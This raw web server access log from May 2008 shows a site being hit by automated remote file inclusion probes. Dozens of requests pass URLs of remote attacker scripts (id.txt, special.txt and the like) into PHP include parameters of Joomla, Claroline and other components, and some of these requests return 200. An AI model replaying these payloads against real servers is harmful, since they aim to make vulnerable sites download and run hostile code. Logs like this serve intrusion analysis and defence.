77.162.98.149 - - [28/May/2008:09:12:21 -0700] "GET /blog/index.php/comments/feed HTTP/1.1" 200 3145 "-" "Java/1.6.0_04" "dmulk.com"
218.234.21.89 - - [28/May/2008:09:12:28 -0700] "GET /logs/plus.php?_pages_dir=http://museo.infoitos.com//components/com_rwcards/y.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
218.234.21.89 - - [28/May/2008:09:12:28 -0700] "GET /plus.php?_pages_dir=http://museo.infoitos.com//components/com_rwcards/y.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
77.162.98.149 - - [28/May/2008:09:12:33 -0700] "GET /blog/index.php/2008/04/03/hello-world HTTP/1.1" 200 7189 "-" "Java/1.6.0_04" "dmulk.com"
77.162.98.149 - - [28/May/2008:09:12:34 -0700] "GET /blog/wp-comments-post.php HTTP/1.1" 405 5 "-" "Java/1.6.0_04" "dmulk.com"
61.221.117.243 - - [28/May/2008:09:12:35 -0700] "GET /logs/access_080325.log//db.php?commonpath=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.162.98.149 - - [28/May/2008:09:12:44 -0700] "GET /blog/index.php/2008/04/12/great-day-for-a-ride HTTP/1.1" 200 11457 "-" "Java/1.6.0_04" "dmulk.com"
64.20.46.121 - - [28/May/2008:09:12:48 -0700] "GET /logs/access_080115.log/errors.php?error=http://www.lynnlott.com/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.20.46.121 - - [28/May/2008:09:12:48 -0700] "GET /logs/access_080113.log/errors.php?error=http://www.lynnlott.com/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.162.98.149 - - [28/May/2008:09:12:56 -0700] "GET /blog/index.php/2008/04/03/hello-world/trackback HTTP/1.1" 200 7189 "-" "Java/1.6.0_04" "dmulk.com"
77.162.98.149 - - [28/May/2008:09:13:08 -0700] "GET /blog/index.php/2008/04/12/great-day-for-a-ride/trackback HTTP/1.1" 200 11458 "-" "Java/1.6.0_04" "dmulk.com"
77.162.98.149 - - [28/May/2008:09:13:09 -0700] "GET /blog/xmlrpc.php?rsd HTTP/1.1" 200 734 "-" "Java/1.6.0_04" "dmulk.com"
77.162.98.149 - - [28/May/2008:09:13:10 -0700] "GET /blog/wp-login.php?action=lostpassword HTTP/1.1" 200 1722 "-" "Java/1.6.0_04" "dmulk.com"
75.125.202.82 - - [28/May/2008:09:13:21 -0700] "GET /logs/access_080106.log/claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.125.202.82 - - [28/May/2008:09:13:21 -0700] "GET /claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.125.202.82 - - [28/May/2008:09:13:22 -0700] "GET /logs/claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.78.216.197 - - [28/May/2008:09:14:04 -0700] "GET //add.php?Htmls=http://www.iglesialcs.cl/newweb/cache/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
82.78.216.197 - - [28/May/2008:09:14:04 -0700] "GET /logs//add.php?Htmls=http://www.iglesialcs.cl/newweb/cache/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:09:14:06 -0700] "GET /logs/access_080218.log//modules/TotalCalendar/about.php?inc_dir=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:09:14:07 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:09:14:07 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
84.243.253.159 - - [28/May/2008:09:14:24 -0700] "GET /logs/access_080412.log/solpot.html?body=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.243.253.159 - - [28/May/2008:09:14:24 -0700] "GET /solpot.html?body=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.243.253.159 - - [28/May/2008:09:14:25 -0700] "GET /logs/solpot.html?body=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.243.253.159 - - [28/May/2008:09:14:25 -0700] "GET /logs/access_080222.log/solpot.html?body=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:09:14:30 -0700] "GET /logs/access_080218.log//modules/TotalCalendar/about.php?inc_dir=http://members.lycos.co.uk/fuker00/alb.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:09:14:30 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://members.lycos.co.uk/fuker00/alb.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:09:14:30 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://members.lycos.co.uk/fuker00/alb.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
75.125.202.82 - - [28/May/2008:09:14:31 -0700] "GET /logs/access_080201.log/claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.54.9.218 - - [28/May/2008:09:15:03 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://mfe-gay.de/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.54.9.218 - - [28/May/2008:09:15:03 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://kiliclub.com/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:09:15:12 -0700] "GET /logs/access_080213.log//modules/TotalCalendar/about.php?inc_dir=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
72.47.201.117 - - [28/May/2008:09:15:21 -0700] "GET /logs//nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
72.47.201.117 - - [28/May/2008:09:15:22 -0700] "GET //nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:09:15:25 -0700] "GET /logs/access_080213.log//modules/TotalCalendar/about.php?inc_dir=http://members.lycos.co.uk/fuker00/alb.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
62.2.100.138 - - [28/May/2008:09:15:45 -0700] "GET /logs/access.log//admin/index.php?loadadminpage=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:09:15:54 -0700] "GET //index.php?option=com_custompages&cpage=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:09:15:54 -0700] "GET //index.php?option=com_custompages&cpage=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:09:15:54 -0700] "GET //index.php?option=com_custompages&cpage=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
211.115.213.77 - - [28/May/2008:09:16:02 -0700] "GET /logs/access_071225.log/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.77 - - [28/May/2008:09:16:02 -0700] "GET /logs/access_071225.log/components/com_extcalendar/errors.php?error=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.77 - - [28/May/2008:09:16:02 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.77 - - [28/May/2008:09:16:02 -0700] "GET /logs/access_071225.log/components/com_extcalendar/errors.php?error=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.77 - - [28/May/2008:09:16:03 -0700] "GET /logs/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.77 - - [28/May/2008:09:16:03 -0700] "GET /components/com_extcalendar/errors.php?error=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.77 - - [28/May/2008:09:16:03 -0700] "GET /components/com_extcalendar/errors.php?error=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.77 - - [28/May/2008:09:16:03 -0700] "GET /logs/access_071225.log/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.77 - - [28/May/2008:09:16:03 -0700] "GET /logs/components/com_extcalendar/errors.php?error=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.77 - - [28/May/2008:09:16:03 -0700] "GET /logs/components/com_extcalendar/errors.php?error=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.77 - - [28/May/2008:09:16:03 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.77 - - [28/May/2008:09:16:04 -0700] "GET /logs/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:09:16:04 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.200.229.181 - - [28/May/2008:09:16:04 -0700] "GET /components/com_extcalendar/errors.php?error=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:09:16:08 -0700] "GET //index.php?option=com_custompages&cpage=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:09:16:08 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.80.134 - - [28/May/2008:09:16:19 -0700] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://justbarelylegal.com/ct/test.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
209.62.80.134 - - [28/May/2008:09:16:19 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://justbarelylegal.com/ct/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
62.2.100.138 - - [28/May/2008:09:16:22 -0700] "GET /logs/access_080218.log//skin/zero_vote/error.php?dir=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:09:16:27 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:09:16:29 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:09:16:30 -0700] "GET //index.php?option=com_custompages&cpage=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:09:16:31 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:09:16:33 -0700] "GET //index.php?option=com_custompages&cpage=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:09:16:33 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [28/May/2008:09:16:39 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
195.12.53.176 - - [28/May/2008:09:16:39 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
85.17.111.38 - - [28/May/2008:09:16:40 -0700] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
85.17.111.38 - - [28/May/2008:09:16:40 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
74.53.68.226 - - [28/May/2008:09:16:55 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:09:16:59 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://www.gasthof-neumeister.com/images/zoom/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.68.226 - - [28/May/2008:09:16:59 -0700] "GET //index.php?option=com_custompages&cpage=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.68.226 - - [28/May/2008:09:16:59 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:09:17:04 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.gasthof-neumeister.com/images/zoom/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:09:17:05 -0700] "GET //index.php?option=com_custompages&cpage=http://www.gasthof-neumeister.com/images/zoom/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.134.122 - - [28/May/2008:09:17:37 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://o-x-r-a-n-a.ru/forum/language/.lang/idbut.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.44.134.122 - - [28/May/2008:09:17:37 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://o-x-r-a-n-a.ru/forum/language/.lang/idbut.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.44.134.122 - - [28/May/2008:09:17:38 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://o-x-r-a-n-a.ru/forum/language/.lang/idbut.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.68.226 - - [28/May/2008:09:17:38 -0700] "GET //index.php?option=com_custompages&cpage=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
81.173.19.23 - - [28/May/2008:09:17:54 -0700] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
81.173.19.23 - - [28/May/2008:09:17:54 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:09:18:19 -0700] "GET /logs//blocks/block_site_map.php?root_folder_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:09:18:19 -0700] "GET //blocks/block_site_map.php?root_folder_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.68.226 - - [28/May/2008:09:18:25 -0700] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
74.53.68.226 - - [28/May/2008:09:18:25 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
24.148.29.218 - - [28/May/2008:09:18:51 -0700] "GET /logs/access_080218.log//modules/vwar/admin/admin.php?vwar_root=http://192.192.238.121/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.243.253.159 - - [28/May/2008:09:20:19 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.243.253.159 - - [28/May/2008:09:20:19 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.243.253.159 - - [28/May/2008:09:20:19 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:09:20:21 -0700] "GET /logs/access_080218.log//modules/TotalCalendar/about.php?inc_dir=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:09:20:21 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:09:20:21 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
211.115.213.77 - - [28/May/2008:09:20:23 -0700] "GET /logs/access_080118.log/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.77 - - [28/May/2008:09:20:24 -0700] "GET /logs/access_080118.log/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.77 - - [28/May/2008:09:20:25 -0700] "GET /logs/access_080118.log/components/com_extcalendar/errors.php?error=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.77 - - [28/May/2008:09:20:25 -0700] "GET /logs/access_080118.log/components/com_extcalendar/errors.php?error=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.125.202.82 - - [28/May/2008:09:20:40 -0700] "GET //index.php?option=com_custompages&cpage=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
24.11.142.67 - - [28/May/2008:09:20:50 -0700] "GET / HTTP/1.1" 200 11606 "-" "Mozilla/4.0 (compatible; GoogleToolbar 4.0.1602.1060-big; Windows XP 5.1; MSIE 7.0.5730.11)" "www.dmulk.com"
201.25.155.27 - - [28/May/2008:09:21:08 -0700] "GET /logs/access_080327.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:09:21:13 -0700] "GET /claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:09:21:14 -0700] "GET /logs/access_080213.log//modules/TotalCalendar/about.php?inc_dir=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:09:21:17 -0700] "GET /claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:09:21:17 -0700] "GET /claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:09:21:22 -0700] "GET /logs/access_080228.log//modules/TotalCalendar/about.php?inc_dir=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [28/May/2008:09:21:26 -0700] "GET /logs/access_080228.log//modules/TotalCalendar/about.php?inc_dir=http://members.lycos.co.uk/fuker00/alb.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
75.125.202.82 - - [28/May/2008:09:22:25 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.125.202.82 - - [28/May/2008:09:22:27 -0700] "GET //index.php?option=com_custompages&cpage=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
75.125.202.82 - - [28/May/2008:09:22:27 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.200.229.181 - - [28/May/2008:09:22:32 -0700] "GET /logs/access_080106.log/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.116.44.60 - - [28/May/2008:09:22:39 -0700] "GET /logs/access_080309.log/tutunghttp://h1.ripway.com/bongku/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [28/May/2008:09:22:39 -0700] "GET /tutunghttp://h1.ripway.com/bongku/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
